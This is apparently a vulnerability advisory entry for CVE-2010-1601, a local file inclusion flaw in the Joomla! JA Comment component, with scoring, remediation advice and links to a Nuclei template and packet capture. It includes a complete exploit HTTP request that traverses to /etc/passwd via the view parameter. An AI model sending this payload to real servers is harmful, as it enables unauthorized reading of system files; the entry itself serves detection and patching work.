| Title | Joomla! Component JA Comment - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. |
| Remediation | Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.19972 |
| CVE ID | CVE-2010-1601 |
| CWE ID | CWE-22 |
| Tags | cve cve2010 joomla lfi edb packetstorm joomlamart vuln |
A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
GET /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1601.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-1601.pcap
N/AN/A